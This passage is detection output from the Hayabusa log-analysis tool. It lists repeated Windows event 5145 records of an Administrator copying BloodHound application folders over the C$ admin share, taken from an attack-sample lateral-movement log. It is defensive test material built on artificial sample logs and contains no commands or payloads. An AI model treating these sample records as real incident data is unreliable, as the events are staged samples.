Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 